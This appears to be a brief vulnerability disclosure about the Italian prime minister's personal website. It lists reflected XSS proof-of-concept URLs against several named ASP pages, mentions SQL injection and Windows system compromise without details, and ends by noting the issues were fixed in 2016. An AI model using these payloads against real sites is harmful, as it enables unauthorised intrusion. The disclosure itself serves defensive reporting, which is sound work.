Personal website of the Italian prime minister.
OLDER WEBSITE
XSS and SQL injection. System compromise (Windows).
http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70
http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=1%EF%BF%BD%EF%BF%BD%EF%BF%BD72195%EF%BF%BD%EF%BF%BD%EF%BF%BD72195/0012%EF%BF%BD%EF%BF%BD%EF%BF%BD0%EF%BF%BD%EF%BF%BD%EF%BF%BDvedi_evento%EF%BF%BD%EF%BF%BD%EF%BF%BD1%EF%BF%BD%EF%BF%BD%EF%BF%BD0%EF%BF%BD%EF%BF%BD%EF%BF%BDpulisci%EF%BF%BD%EF%BF%BD%EF%BF%BD
carrello_beta.asp?azione=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70
finestra_stampa_beta.asp?numero_immagini=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E%3C%22%A7%A7%A7%A7%A7%A7vedi_v%27id%27eo%A7%A7%A71%A7%A7%A70
popup.asp
http://matteorenzi.sgpitalia.com/contenuto_beta.asp?parametri=76678%A7%A7%A776678/0075%A7%A7%A7vedi_evento%A7%A7%A71%A7%A7%A70#ad-image-5
UPDATE! 2015 On WORDPRESS
Author enumeration is allowed (not a big issue). Directory listing is enabled, e.g. /wp-content/plugins/ (not a big issue).
SQL injection (I will disclose/update this part in the future).
UPDATE 2016
They've fixed the critical issues.